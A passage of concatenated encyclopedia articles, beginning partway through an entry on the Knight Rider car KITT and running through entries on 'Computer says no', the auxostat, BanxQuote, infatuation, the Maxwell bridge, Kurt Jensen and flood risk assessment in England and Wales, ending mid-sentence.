25, 2014, fifth episode of the Dutch TV programme Syndroom, featuring people with Down syndrome who wish to fulfil a dream, features Twan Vermeulen, a Knight Rider fan who wishes to meet David Hasselhoff and KITT. Together with the show's presenter they fly to L.A. and go searching for Hasselhoff's house. They "find" Hasselhoff on the driveway in front of his house, dusting off KITT. After KITT speaks a personal message to Twan, Hasselhoff offers to go with him to take KITT for a spin, "Freak out some people on the freeway", which they did with great pleasure for everyone involved. The right-hand drive KITT, known as the "Official Right Hand Drive KITT" as used in the video "Jump In My Car" by David Hasselhoff, is owned by a company called Wilderness Studios Australia. A small group of individuals that call themselves Knight Rider Historians have stated that they have the most extensive research and data on the production of the series, including production call sheets and records on vehicles owned by Universal Studios while the show was in production. They purchased two of the screen used KITT cars, which have subsequently been restored. One of the cars had appeared in the episode where KITT was dumped into an acid pit and appears gutted and light grey in color on screen in the episode. The cars are frequently on display - one is currently on display in the Peterson Museum in Los Angeles. They also recently tracked down the original FLAG Semi truck and the trailer, used in the first seasons of the show, which are now being restored as well. The Semi truck was found in Idaho in a field. The 1978 Dorsey trailer had been modified to carry race cars in the late 1980s and the original rear ramp door used to drive KITT in and out on the series had long been removed. They plan to fully restore the trailer to appear exactly as it did during the series run, albeit slightly smaller scale, because the interior of the trailer seen on-screen was actually an interior set on the Universal Studios lot, and was several feet wider than the actual trailer. Knight Industries Three Thousand (KITT) The 2008 update to Knight Rider includes a new KITT – the acronym now standing for Knight Industries Three Thousand. The KITT platform is patterned on a Shelby GT500KR and differs from the original Two Thousand unit in several ways. For example, the 2008 KITT utilizes nano-technology, allowing the car's outer shell to change colors and morph itself into similar forms temporarily. The nanotech platform is written as needing the AI active in order to produce any of these effects, unlike the original car's gadgets and "molecular bonded shell" which allowed it to endure extreme impacts. These extreme down-sides to the use of nanotech have been demonstrated when villains are able to cause significant damage, such as shooting out windows, when the AI is deactivated. It can also turn into two different types of a Ford F-150 4x4 truck (one completely stock and the other with some modifications), a Ford E-150 van, a Ford Crown Victoria Police Interceptor, a special edition Warriors In Pink Mustang (in support of breast cancer awareness month), a Ford Flex, and a 1969 Ford Mustang Mach 1 for disguise or to use the alternate modes' capabilities (such as off-road handling). The car can engage an "Attack Mode", featuring scissor/conventional hybrid doors, which allows it to increase speed and use most of its gadgets (including turbo boost). It had a different looking attack mode in the pilot which was used whenever the car needed to increase speed. Its downside however is that it only seats two. KITT is also capable of functioning submerged, maintaining life support and system integrity while underwater. While the original series stated the original KITT was designed by Wilton Knight, the 2008 TV movie implies Charles Graiman may have co-designed the car and the AI for Wilton Knight, was subsequently relocated to protect him and his family, and later designed the Knight Industries Three Thousand. KITT's weapons include a grappling hook located in the front bumper, usable in normal and attack modes, two gatling-style guns that are retracted from the hood, a laser, and missile launchers usable only in attack mode, which were first used in "Knight of the Hunter". In the Halloween episode "Knight of the Living Dead", KITT demonstrates the ability to cosmetically alter his appearance, becoming a black Mustang convertible with a pink trim as a Halloween costume. This configuration had the scanner bar relocated to behind the grille. Dr. Graiman also reveals in this episode that a backup neural network exists when he suggests downloading KITT's files and reuploading them to the backup, to which replies "The Backup is not me." In the pilot, KITT had shown himself capable of similarly altering his external appearance—changing his color and licence plate. In "Knight of the Zodiac", KITT uses a dispenser located in his undercarriage to spread black ice, and a fingerprint generator in the glovebox to overlay the fingerprints of a captured thief over Mike's. KITT has numerous other features: An olfactory sensor that allows KITT to "smell" via an atmospheric sampling device mounted in his front bumper Turbo boost A voice stress analyzer that is used to process spoken voices and determine if someone may be lying A computer printout that could print hard copies of data on a dashboard-mounted printer, a backup mainframe processor A windshield projection used in place of the center console screen in the pilot for displaying extra information as well as the video communication link with the SSC A bio matrix scanner used to detect the health status of persons in the immediate area A hood surface screen An electromagnetic pulse projector that can disable any electronic circuit or device within the given area The ability to fire disk-like objects that produce an intense heat source to deter heat-seeking projectiles The ability to fill the cabin with tear gas to incapacitate thieves A 3D object printer that allows for the creation of small 3D objects (such as keys) based on available electronic data A standard printer used for documents and incoming faxes that is located in the passenger side dash A small arms cache accessible via the glove box area that usually contains two 9MM handguns with extra magazines for occupant's protection outside KITT A first aid inside the glove box that allows for field mending of physical wounds such as lost appendages A software program secretly built into KITT that, when activated, by the SSC, turns KITT into a bomb using his fuel as the charge and his computer as the detonator Knight Industries Four Thousand A 1991 made-for-TV movie sequel to the 1982 series, Knight Rider 2000, saw KITT's original microprocessor unit transferred into the body of the vehicle intended to be his successor, the Knight 4000 (referred to as "KIFT" by fans). The vehicle had numerous 21st-century technological improvements over the 1980s Pontiac Trans-Am version of KITT, such as an amphibious mode (which allows the car to travel across water like a speedboat), a virtual reality heads-up display (or VR-HUD, which utilized the entire windshield as a video display), a microwave stun device that could remotely incapacitate a human target, a remote target assist that helps the pilot to aim and fire with a complete and perfect accuracy, voice activated controls, a fax machine, an infrared scanner that could identify laser scope rifles as well as hidden objects giving off heat, a more complex olfactory scan, a voice sampler that could simulate any voice which has been recorded into the Knight 4000's memory, a microwave projector that could cause the temperatures of targeted objects to quickly rise and either ignite or explode, and a thermal sensor that allows the Knight 4000 to watch and record what is happening in a particular place. However, no acknowledgement is made to this spin-off in the 2008–2009 series revival. The studio was unable to use the real Pontiac Banshee IV concept car for the movie, so instead it hired Jay Ohrberg Star Cars Inc. to customize a 1991 Dodge Stealth for the Knight 4000. After filming wrapped, the custom car was used on other TV productions of the time and can also be seen, albeit briefly, as a stolen supercar in CHiPs '99, as repainted future police vehicles in Power Rangers Time Force, in an episode of the television series Black Scorpion in March 2001, and in a hidden camera TV series called Scare Tactics. After being abandoned and unmaintained for 10 years, one of the screen-used cars was offered for sale in January 2021 by Bob's Prop Shop in Las Vegas. KARR KARR (Knight Automated Roving Robot) is the name of a fictional, automated, prototype vehicle featured as a major antagonist of KITT (Knight Industries Two Thousand), in two episodes of the 1982 original series, and was part of a multi-episode story arc in the 2008 revived series. KARR (voiced by Peter Cullen) first appeared in "Trust Doesn't Rust" aired on NBC on November 19, 1982, where he seemingly met his demise at the end. However, he was so popular with viewers that he was brought back again in "K.I.T.T. vs. K.A.R.R.", for a second time (voiced by voice actor Paul Frees) which aired on NBC on November 4, 1984. Trust Doesn't Rust was also printed in book form, written by Roger Hill and Glen A. Larson, following the story and general script of the original television episode, expanding some areas of the plot and adding several extra secondary characters. KARR was brought back in 2009 for "Knight to King's Pawn" of the new "Knight Rider" series of 2008–2009 for a third time (marking it as one of the very few villains in the original series and the new series to make a return appearance). KARR design and development KARR was originally designed by Wilton Knight and built by Knight Industries for military purposes for the Department of Defense. After the completion of the vehicle, the KARR processor was installed and activated. However, a programming error caused the computer to be unstable and potentially dangerous. KARR was programmed for self-preservation, but this proved to be dangerous to the Foundation's humanitarian interests. The project was suspended and KARR was stored until a solution could be found. Once KITT was constructed, it was presumed that his prototype KARR had been deactivated and dismantled. However, the latter did not occur and KARR was placed in storage and forgotten following the death of Wilton Knight. KARR was later unwittingly reactivated by thieves in the original episode Trust Doesn't Rust, and was thought destroyed, but then reappeared in the episode K.I.T.T. vs. K.A.R.R and was seen to be finally destroyed by Michael and KITT. Originally KARR was identical to KITT – all black with a red scan bar. Upon KARR's return in "K.I.T.T. vs. K.A.R.R.", his scan bar is now amber/yellow but is otherwise still the same as KITT. KARR later gets a brand new two-tone paint job incorporating a silver lower body into the familiar black finish. KARR's scanner originally made a low droning noise, and the sound of KARR's engine originally sounded rough, but in the return episode the scanner and the engine both sounds similar to KITT's albeit with a slight reverb effect added. In "Trust Doesn't Rust" KARR had no license plates, but a California license plate that read "KARR" from his second appearance onwards. KARR's voice modulator showed as greenish-yellow on his dash display, a different color and design than the various incarnations of KITT's red display. Personality Unlike KITT, whose primary directive is to protect human life, KARR was programmed for self-preservation, making him a ruthless and unpredictable threat. He does not appear as streetwise as KITT, being very naïve and inexperienced and having a childlike perception of the world. This has occasionally allowed people to take advantage of his remarkable capabilities for their own gain; however, due to his ruthless nature, he sometimes uses people's weaknesses and greed as a way to manipulate them for his own goals. Despite this, he does ultimately consider itself superior (always referring to KITT as "the inferior production line model") as well as unstoppable, and due to his programming, the villains do not usually get very far. KARR demonstrates a complete lack of respect or loyalty – on one occasion ejecting his passenger to reduce weight and increase his chances of escape. KARR's evil personality is also somewhat different in the comeback episode. His childlike perceptions are diminished into a more devious personality, completely cold and bent on revenge. His self-preservation directive is no longer in play. When KARR is close to exploding after receiving severe damage; he willingly turbo-jumps into a mid-air collision with KITT, hoping that his own destruction would also spell his counterpart's. Even KARR's modus operandi is different; servicing enough in the first episode, he aims to actually make use of other people to serve his own needs. One explanation of this change could be as a result of the damage he received after falling over the cliff at the end of "Trust Doesn't Rust", causing further malfunctions in his programming. Indeed, KITT himself is seen to malfunction and suffer change of personality as a result of damage in several other episodes. KARR 2.0 To mirror the original series, the nemesis and prototype of the second KITT (Knight Industries Three Thousand) is also designated KARR in the new series. KARR 2.0 (Peter Cullen) is mentioned in the new Knight Rider series episode "Knight of the Living Dead", and is said to be a prototype of KITT (Knight Industries Three Thousand). The new KARR acronym was changed to "Knight Auto-cybernetic Roving Robotic-exoskeleton". KARR's visual identity has also had similar changes for the new series. Instead of an automobile, a schematic display shows a heavily armed humanoid-looking robot with wheeled legs that converts into an ambiguous off-road vehicle. KARR has the ability to transform from vehicle mode into a large wheeled robotic exoskeleton, instead of KITT's "Attack Mode". The vehicle mode of KARR is a 2008–2009 Shelby GT500KR with the license plate initials K.R. KARR is once again voiced by Peter Cullen, who also voiced the first appearance of KARR in "Trust Doesn't Rust". KARR was originally designed for military combat. Armed with twin machine guns on each shoulder and missiles, the exoskeleton combines with a human being for easier control. KARR is visually identical to KITT in this iteration, lacking the two-tone black and silver paint job of the 1980s version of KARR. The only difference is the scanner and voice box, which are yellow compared to KITT's red. Once again, similar to the original character, this entirely different "KARR" project (2.0) had an A.I. that was programmed for self-preservation, and he was deactivated and placed in storage after he reprogrammed itself and killed seven people. When KARR finally appears again in the episode "Knight to King's Pawn", he takes a form once again similar to KITT as a 2008 Ford Shelby Mustang GT500KR, and is once again 100% black like KITT 3000, the only difference is that he has a yellow scan light bar and 100% yellow color voice module. In the original series, it was more amber/yellow, and KARR's voice module originally yellow-green in the original series. KARR's scanner sounds much lower with much more of an echo. The sound is especially noticeable when KARR is chasing down KITT while he is still in Ford Mustang mode. Reception and significance KITT, despite being just an AI without a body, has proven to be a popular character. One of the reasons for KITT's attractiveness was in the fact that "domesticated" then-powerful technology (computers), making it "accessible, flexible and portable" in a way that was also "reliable and secure". Nickianne Moody has argued that, through KITT, Knight Rider became one of "the first popular texts to visualize and narrativize the potential of [computer] technologies to transform daily life"; she also argued that the relationship between Knight and KITT was more complex and nuanced than many "buddy-ship" relationships of other "Cold War warriors" in the Hollywood works of its era. KITT has also been discussed in the context of the human-robot (or human-AI) interaction. KITT has also proven to be influential for the design of real-world computers for vehicles, with a number of studies noting that the science-fiction vision of the 1980s, portrayed in the show, is coming to be realized in the real life as of the early 21st century. Shaked and Winter noted that it was "one of the most appealing multimodal mobile interfaces of the 1980s", although talking to computers in a way similar to humans is still in its early stages of maturing as a technology as of 2019. Various toy versions of KITT have been released. Among the best-known Knight Rider memorabilia is the remote controlled KITT, the Knight Rider lunch box, and the deluxe version of KITT. The deluxe model of KITT, sold by Kenner Toys and dubbed the "Knight 2000 Voice Car", spoke electronically (actual voice of William Daniels), featured a detailed interior and a Michael Knight action figure. ERTL released die-cast toys of KITT in three different sizes—the common miniature sized model, a 'medium' sized model, and a large sized model. These toys featured red reflective holograms on the nose to represent the scanner. Also in late 2004, 1/18 scale die-cast models of KITT and KARR were produced from ERTL complete with detailed interior and light up moving scanner just like in the series. In September 2006, Hitari, a UK based company that produces remote control toy cars, released the Knight Rider KITT remote control car in 1/15 scale complete with the working red scanner lights, KITT's voice from the TV show and the car's turbine engine sound with the "cylon" scanner sound effect. In December 2012, Diamond Select Toys released a talking electronic 1/15 scale KITT which features a light up dashboard, scanner, foglights and tail lights along with the original voice of KITT, William Daniels, all at a push of a button. Mattel has released two die-cast metal models of KARR. A 1:18 scale model as part of the Hot Wheels Elite collection and a 1:64 scale model as part of the Hot Wheels Retro Nostalgia Entertainment collection. They both resemble KARR's appearance from KITT vs. KARR with silver paint around the bottom half of the vehicle. The small one however lacks the amber scanner light and instead retains the red scanner from KARR's appearance in Trust Doesn't Rust and there is also a KITT which is completely identical to KARR in its first episode in Trust Doesn't Rust. KITT and KARR are both in Knight Rider: The Game and its sequel. They also appear in the Knight Rider World in Lego Dimensions. Featuring the iconic voice of William Daniels, the Knight Rider GPS was a fully working GPS using Mio navigational technology. The GPS featured custom recorded voices so that the unit could "speak to" its owner using their own name if it was one of the ones in the recorded set of names. References Text was copied/adapted from K.I.T.T. (2000) at Knight Rider Wiki, which is released under a Creative Commons Attribution-Share Alike 3.0 (Unported) (CC-BY-SA 3.0) license. External links Bringing KITT Back! as detailed in Project: K.I.T.T. Fictional artificial intelligences Fictional cars Fictional characters who can move at superhuman speeds Fictional characters with superhuman durability or invulnerability Fictional computers Knight Rider characters Pontiac (automobile) Television characters introduced in 1982
KITT
Technology
9,533
29,504,901
https://en.wikipedia.org/wiki/Computer%20says%20no
"Computer says no" is a catchphrase first used in the British sketch comedy television programme Little Britain in 2004. In British culture, the phrase is used to criticise public-facing organisations and customer service staff who rely on information stored on or generated by a computer to make decisions and respond to customers' requests, often in a manner which goes against common sense. It may also refer to a deliberately unhelpful attitude towards customers and service-users commonly experienced within British society, whereby more could be done to reach a mutually satisfactory outcome, but is not. Little Britain In Little Britain, "Computer says no" is the catchphrase of Carol Beer (played by David Walliams), a bank worker and later holiday rep and hospital receptionist, who always responds to a customer's enquiry by typing it into her computer and responding with "Computer says no" to even the most reasonable of requests. When asked to do something aside from asking the computer, she would shrug and remain obstinate in her unhelpfulness, and ultimately cough in the customer's face. The phrase was also used in the Australian soap opera Neighbours in 2006 as a reference to Little Britain. The catchphrase returns in Little Brexit, where Carol is still working at Sunsearchers as a holiday rep, confronted by a woman wanting to go to Europe. Carol uses the paraphrase "Brexit Says No", when the woman wants to go to France, Spain and Italy. Usage The "Computer says no" attitude often comes from larger companies that rely on information stored electronically. When this information is not updated, it can often lead to refusals of financial products or incorrect information being sent out to customers. These situations can often be resolved by an employee updating the information; however, when this cannot be done easily, the "Computer says no" attitude can be viewed as becoming prevalent when there is unhelpfulness as a result. This attitude can also occur when an employee fails to read human emotion in the customer and reacts according to his or her professional training or relies upon a script. This attitude also crops up when larger companies rely on computer credit scores and do not meet with a customer to discuss his or her individual needs, instead basing a decision upon information stored in computers. Some organisations attempt to offset this attitude by moving away from reliance on electronic information and using a human approach towards requests. "Computer says no" happens in a more literal sense when computer systems employ filters that prevent messages being passed along, as when these messages are perceived to include obscenities. When information is not passed through to the person operating the computer, decisions may be made without seeing the whole picture. Musician Jesca Hoop used the phrase in her 2017 song Animal Kingdom Chaotic; Pitchfork commented that "Computer screens, the implication goes, have turned us into a population of proxies who simulate doing things more than we actually do things." See also Computers Don't Argue Jobsworth Garbage in, garbage out References Comedy catchphrases Computer humour Computers Customer service English phrases Little Britain Popular culture neologisms Quotations from television 2004 neologisms 2004 quotations
Computer says no
Technology
646
13,713,557
https://en.wikipedia.org/wiki/Auxostat
An auxostat is a continuous culture device which, while in operation, uses feedback from a measurement taken on the growth chamber to control the media flow rate, maintaining the measurement at a constant. Auxo was the Greek goddess of spring growth, and represents nutrients as a prefix. However, the most typical auxostats are pH-auxostats, with feedback between the growth rate and a pH meter. Other auxostats may measure oxygen tension, ethanol concentrations, and sugar concentrations References Bioreactors
Auxostat
Chemistry,Engineering,Biology
103
17,630,523
https://en.wikipedia.org/wiki/BanxQuote
BanxQuote was a provider and licensor of indexes and analytics, which were used as a barometer of the U.S. banking and mortgage markets. Its bank rate website and consumer banking marketplace featured daily updated market rates on banking, mortgage and loan products in the United States, until its close in 2010. History and activities BanxQuote was established by its parent BanxCorp in 1984, and its Internet operations were launched at a BanxQuote National Banking Conference held at Salomon Brothers in New York, on April 7, 1995. Clients of the firm have included hundreds of financial institutions nationwide and its indexes were frequently used as a trusted source and performance benchmark by public policymakers, government agencies, major banks and corporations. BanxQuote operated an online national banking marketplace for 15 years, until its exit in 2010. It featured rates on money market accounts, savings and jumbo certificate of deposit (CDs), mortgage loans, home equity and auto loans for various terms and amounts. BanxQuote also provided proprietary state-by-state, regional, and national composite benchmarks for its various banking and lending products. Clients of the firm have included hundreds of banks and financial institutions nationwide. In 1985, The Wall Street Journal started featuring BanxQuote for 17 consecutive years. BanxQuote on Bloomberg Terminal BanxQuote current and historical proprietary data, indices, charts and analytical tools were available on Bloomberg Terminals from 1995 until its exit from the market in 2015, reaching over 250,000 financial market professionals worldwide. The BanxQuote Index, Trademark and Performance benchmarks The Dow Jones Barron's Dictionary of Banking Terms defines the BanxQuote Money Market Index(tm) as an "Index of rates paid by investors on negotiable certificates of deposit and high yield savings accounts, compiled weekly by BanxCorp. The index offers a side-by-side comparison of rates paid by selected banks and savings institutions on small-denomination (under $10,000) savings accounts." The BanxQuote Conforming-Jumbo Mortgage Index(tm) is typically used to analyze the historical spread between national average conforming and jumbo mortgage rates. BanxQuote licenses its registered trademark, proprietary indices, data, analytical tools, and financial applications to third parties. Case studies AAA (American Automobile Association) Money Markets & CDs General Electric Capital Corp. — GE Interest Plus Ford Interest Advantage Notes issued by Ford Motor Credit Company Bloomberg Professional terminals worldwide UBS, one of the world's leading financial institutions Discover Bank, part of Discover Financial Services Countrywide Bank MetLife Bank, a subsidiary of MetLife, Inc. Capital One Direct Banking Charles Schwab & Co. Zions Bank Usage BanxQuote data are cited by various government agencies, policy makers, [GSEs], Non-Profit and Religious Organizations, and economists, such as outlined below. U.S. government agencies The White House Council of Economic Advisers U.S. Senate Committee on Banking, Housing, and Urban Affairs U.S. Department of the Treasury Federal Deposit Insurance Corporation (FDIC) William Poole (Federal Reserve Bank president), Federal Reserve Bank of St. Louis Government Finance Officers Association Office of Federal Housing Enterprise Oversight (OFHEO) Office of Thrift Supervision (OTS) - Selected Asset and Liability Price Tables; As of June 30, 2007 Government Sponsored Enterprises (GSEs) The Role of Freddie Mac, the Federal Home Loan Mortgage Corporation Freddie Mac Provides Stability to the Mortgage Market. Wharton Financial Institutions Center, Working Paper: Measuring the Benefits of Fannie Mae and Freddie Mac to Consumers Foundations, non-profit, judiciary, and religious organizations F.B. Heron Foundation - has established performance benchmarks for each asset class in its mission-related portfolio. The benchmark for deposits is the national average for two-year jumbo deposits as reported by BanxQuote. Michigan Court, Michigan Judicial Institute - CitiStreet Investing Webcast Diocese of Monterey, California In 2007, the bishop of Monterey established a policy that all funds of the Monterey diocese deposited in its Cash Management and Deposit and Loan programs would earn a rate tied to the BanxQuote Money Market Rate. References External links BanxQuote.com website BanxCorp corporate website Financial services companies based in New York City Retail financial services American companies established in 1984 Financial services companies established in 1984 Retail companies established in 1984 American companies disestablished in 2010 Financial services companies disestablished in 2010 Retail companies disestablished in 2010 Companies based in New York (state) Data collection News aggregators
BanxQuote
Technology
937
634,932
https://en.wikipedia.org/wiki/Infatuation
Infatuation, also known as being smitten, is the personal state of being overly driven by an uninformed or otherwise unreasonable passion, usually towards another person for whom one has developed strong romantic or sexual feelings. Psychologist Frank D. Cox said that infatuation could be distinguished from romantic love only when looking back on a particular case of being attracted to a person but which may also evolve into a mature love. Goldstein and Brandon describe infatuation as the first stage of a relationship before developing into a mature intimacy. Whereas love is "a warm attachment, enthusiasm, or devotion to another person", infatuation is "a feeling of foolish or obsessively strong love for, admiration for, or interest in someone or something", a shallower "honeymoon phase" in a relationship. Ian Kerner, a sex therapist, stated that infatuation usually occurred at the beginning of relationships, which is "[...] marked by a sense of excitement and euphoria, and it's often accompanied by lust and a feeling of newness and rapid expansion with a person". The psychologist Adam Phillips has described how illusions of infatuations inevitably resulted in disappointment when learning the truth about a lover. Adolescents often make people an object of extravagant, short-lived passion or temporary love. Youth "It is customary to view young people's dating relationships and first relationships as puppy love or infatuation"; and if infatuation is both an early stage in a deepening sequence of love/attachment, and at the same time a potential stopping point, it is perhaps no surprise that it is a condition especially prevalent in the first, youthful explorations of the world of relationships. Thus "the first passionate adoration of a youth for a celebrated actress whom he regards as far above him, to whom he scarcely dares lift his bashful eyes" may be seen as part of an "infatuation with celebrity especially perilous with the young". Admiration plays a significant part in this, as "in the case of a schoolgirl crush on a boy or on a male teacher. The girl starts off admiring the teacher ... [then] may get hung up on the teacher and follow him around". Then there may be shame at being confronted with the fact that "you've got what's called a crush on him ... Think if someone was hanging around you, pestering and sighing". Of course, "sex may come into this ... with an infatuated schoolgirl or schoolboy" as well, producing the "stricken gaze, a compulsive movement of the throat ... an 'I'm lying down and I don't care if you walk on me, babe', expression" of infatuation. Such a cocktail of emotions "may even falsify the 'erotic sense of reality': when a person in love estimates his partner's virtues he is usually not very realistic ... projection of all his ideals onto the partner's personality". It is this projection that differentiates infatuation from love, according to the spiritual teacher Meher Baba: "In infatuation, the person is a passive victim of the spell of conceived attraction for the object. In love there is an active appreciation of the intrinsic worth of the object of love." Distance from the object of infatuation—as with celebrities—can help maintain the infatuated state. A time-honoured cure for the one who "has a tendre ... infatuated" is to have "thrown them continually together ... by doing so you will cure ... [or] you will know that it is not an infatuation". The possible effects of infatuation and love relationships on the academic behaviour of adolescent students were examined in research. The outcome shows that most of the participants had distraction, stress, and poor academic performance as a result of love relationships and infatuation. Furthermore, the findings highlighted that this has a detrimental effect on learning behaviour among teenagers who are in romantic or infatuated relationships. Types Three types of infatuation have been identified by Brown: the first type is characterized by being "carried away, without insight or proper evaluative judgement, by blind desire"; the second, closely related, by being "compelled by a desire or craving over which the agent has no control" while "the agent's evaluation ... may well be sound although the craving or love remains unaffected by it"; and the third is that of "the agent who exhibits bad judgement and misvaluation for reasons such as ignorance or recklessness". In transference In psychoanalysis, a sign that the method is taking hold is "the initial infatuation to be observed at the beginning of treatment", the beginning of transference. The patient, in Freud's words, "develops a special interest in the person of the doctor ... never tires in his home of praising the doctor and of extolling ever new qualities in him". What occurs, "it is usually maintained ... is a sort of false love, a shadow of love", replicating in its course the infatuations of "what is called true love". However, psychoanalyst Janet Malcolm claims that it is wrong to convince the patient "that their love is an illusion ... that it's not you she loves. Freud was off base when he wrote that. It is you. Who else could it be?"—thereby taking "the question of what is called true love ... further than it had ever been taken". Conversely, in countertransference, the therapist may become infatuated with his/her client: "very good-looking ... she was the most gratifying of patients. She made literary allusions and understood the ones he made ... He was dazzled by her, a little in love with her. After two years, the analysis ground down to a horrible halt". Intellectual infatuations Infatuations need not only involve people, but can extend to objects, activities, and ideas. "Men are always falling in love with other men ... with their war heroes and sport heroes": with institutions, discourses and role models. Thus for example Jung's initial unconditional devotion' to Freud's theories and his 'no less unconditional veneration' of Freud's person' was seen at the time by both men as a 'quasi-religious infatuation' to ... a cult object"; while Freud in turn was "very attracted by Jung's personality", perhaps "saw in Jung an idealized version of himself": a mutual admiration society—"intellectually infatuated with one another". But there are also collective infatuations: "we are all prone to being drawn into social phantasy systems". Thus, for instance, "the recent intellectual infatuation with structuralism and post-structuralism" arguably lasted at least until "September 11 ended intellectual infatuation with postmodernism" as a whole. Economic bubbles thrive on collective infatuations of a different kind: "all boom-bust processes contain an element of misunderstanding or misconception", whether it is the "infatuation with ... becoming the latest dot.com billionaire", or the one that followed with subprime mortgages, once "Greenspan had replaced the tech bubble with a housing bubble". As markets "swung virtually overnight from euphoria to fear" in the credit crunch, even the most hardened market fundamentalist had to concede that such "periodic surges of euphoria and fear are manifestations of deep-seated aspects of human nature"—whether these are enacted in home-room infatuations or upon the global stage. Literary depictions Shakespeare's sonnets have been described as a "Poetics for Infatuation"; as being dominated by one theme, and "that theme is infatuation, its initiation, cultivation, and history, together with its peaks of triumph and devastation"—a lengthy exploration of the condition of being "subject to the appropriate disorders that belong to our infatuation ... the condition of infatuation". In Ivan Turgenev's First Love, a novella from 1860, 16-year-old Woldemar becomes rapturously infatuated with Zinaida, the beautiful daughter of a princess who lives next to his house. Even though she does spend time with him, his intense infatuation is unrequited and he sinks into depression. See also References Further reading Grohol, J. Phys.D (2006). "Love Versus Infatuation", Retrieved: Nov 24th 2008 Harville, H. PhD. (1992). Keeping the Love You Find, New York: Pocket Books. Glencoe/McGraw-Hill. (2000). Whitney, DeBruyne, Sizer-Webb, Health: Making Life Choices (pp. 494–496) Interpersonal relationships Emotions Love
Infatuation
Biology
1,882
5,052,383
https://en.wikipedia.org/wiki/Maxwell%20bridge
A Maxwell bridge is a modification to a Wheatstone bridge used to measure an unknown inductance (usually of low Q value) in terms of calibrated resistance and inductance or resistance and capacitance. When the calibrated components are a parallel resistor and capacitor, the bridge is known as a Maxwell bridge. It is named for James C. Maxwell, who first described it in 1873. It uses the principle that the positive phase angle of an inductive impedance can be compensated by the negative phase angle of a capacitive impedance when put in the opposite arm and the circuit is at resonance; i.e., no potential difference across the detector (an AC voltmeter or ammeter)) and hence no current flowing through it. The unknown inductance then becomes known in terms of this capacitance. With reference to the picture, in a typical application and are known fixed entities, and and are known variable entities. and are adjusted until the bridge is balanced. and can then be calculated based on the values of the other components: To avoid the difficulties associated with determining the precise value of a variable capacitance, sometimes a fixed-value capacitor will be installed and more than one resistor will be made variable. It cannot be used for the measurement of high Q values. It is also unsuited for the coils with low Q values, less than one, because of balance convergence problem. Its use is limited to the measurement of low Q values from 1 to 10. The frequency of the AC current used to assess the unknown inductor should match the frequency of the circuit the inductor will be used in - the impedance and therefore the assigned inductance of the component varies with frequency. For ideal inductors, this relationship is linear, so that the inductance value at an arbitrary frequency can be calculated from the inductance value measured at some reference frequency. Unfortunately, for real components, this relationship is not linear, and using a derived or calculated value in place of a measured one can lead to serious inaccuracies. A practical issue in construction of the bridge is mutual inductance: two inductors in propinquity will give rise to mutual induction: when the magnetic field of one intersects the coil of the other, it will reinforce the magnetic field in that other coil, and vice versa, distorting the inductance of both coils. To minimize mutual inductance, orient the inductors with their axes perpendicular to each other, and separate them as far as is practical. Similarly, the nearby presence of electric motors, chokes and transformers (like that in the power supply for the bridge!) may induce mutual inductance in the circuit components, so locate the circuit remotely from any of these. The frequency dependence of inductance values gives rise to other constraints on this type of bridge: the calibration frequency must be well below the lesser of the self-resonance frequency of the inductor and the self-resonance frequency of the capacitor, Fr < min(Lsrf,Csrf)/10. Before those limits are approached, the ESR of the capacitor will likely have significant effect, and have to be explicitly modeled. For ferromagnetic core inductors, there are additional constraints. There is a minimum magnetization current required to magnetize the core of an inductor, so the current in the inductor branches of the circuit must exceed the minimum, but must not be so great as to saturate the core of either inductor. The additional complexity of using a Maxwell-Wien bridge over simpler bridge types is warranted in circumstances where either the mutual inductance between the load and the known bridge entities, or stray electromagnetic interference, distorts the measurement results. The capacitive reactance in the bridge will exactly oppose the inductive reactance of the load when the bridge is balanced, allowing the load's resistance and reactance to be reliably determined. See also Wien bridge, a similar circuit for calibrating unknown capacitance Anderson's bridge, a modification of Maxwell's bridge that accurately measures capacitance Bridge circuit Further reading References Electrical meters Bridge circuits Measuring instruments James Clerk Maxwell Impedance measurements
Maxwell bridge
Physics,Technology,Engineering
889
42,695,664
https://en.wikipedia.org/wiki/Kurt%20Jensen%20%28computer%20scientist%29
Kurt Jensen (born 1950) is a Danish computer science professor at Aarhus University has been writing peer-reviewed papers since 1976, and by 2014 had an h-index of 32. He is best known for his research into coloured Petri nets. References Living people 1950 births Academic staff of Aarhus University Danish computer scientists Date of birth missing (living people)
Kurt Jensen (computer scientist)
Technology
72
13,127,033
https://en.wikipedia.org/wiki/Flood%20risk%20assessment
A flood risk assessment (FRA) is an assessment of the risk of flooding from all flooding mechanisms, the identification of flood mitigation measures and should provide advice on actions to be taken before and during a flood. The sources of water which produce floods include: groundwater, surface water (rivers, streams or watercourses), artificial water (burst water mains, canals or reservoirs), sewers and drains, seawater. For each of the sources of water, different hydraulic intensities occur. Floods can occur because of a combination of sources of flooding, such as high groundwater and an inadequate surface water drainage system. The topography, hydrogeology and physical attributes of the existing or proposed development need to be considered. A flood risk assessment should be an evaluation of the flood risk and the consequences and impact and vulnerability. In the UK, the writing of professional flood risk assessments is undertaken by Civil Engineering Consultants. They will have membership of the Institution of Civil Engineers and are bound by their rules of professional conduct. A key requirement is to ensure such professional flood risk assessments are independent to all parties by carrying out their professional duties with complete objectivity and impartiality. Their professional advice should be supported by professional indemnity insurance for such specific professional advice ultimately held with a Lloyd's of London underwriter. Professional flood risk assessments can cover single buildings or whole regions. They can part of a due-diligence process for existing householders or businesses, or can be required in England and Wales to provide independent evidence to a planning application on the flood risk. England and Wales In England and Wales, the Environment Agency requires a professional Flood Risk Assessment (FRA) to be submitted alongside planning applications in areas that are known to be at risk of flooding (within flood zones 2 or 3) and/ or are greater than 1ha in area, planning permission is not usually granted until the FRA has been accepted by the Environment Agency. PPS 25 – England only Flood Risk Assessments are required to be completed according to the National Planning Policy Framework, which replaces Planning Policy Statement PPS 25: Development and Flood Risk. The initial legislation (PPG25) was introduced in 2001 and subsequently revised. PPS 25 was designed to "strengthen and clarify the key role of the planning system in managing flood risk and contributing to adapting to the impacts of climate change." and sets out policies for local authorities to ensure flood risk is taken into account during the planning process to prevent inappropriate development in high risk areas and to direct development away from areas at highest risk. In its introduction, PPS25 states "flooding threatens life and causes substantial damage to property [and that] although [it] cannot be wholly prevented, its impacts can be avoided and reduced through good planning and management". Composition of an FRA For a flood risk assessment to be written, information is needed concerning the existing and proposed developments, the Environment Agency modeled flood levels and topographic levels on site. At its most simple (and cheapest) level an FRA can provide an indication of whether a development will be allowed to take place at a site. An initial idea of the risk of fluvial flooding to a local area can be found on the Environment Agency flood map website. FRAs consist of a detailed analysis of available data to inform the Environment Agency of flood risk at an individual site and also recommend to the developer any mitigation measures. More costly analysis of flood risk can be achieved through detailed flood modelling to challenge the agency's modelled levels and corresponding flood zones. The FRA takes 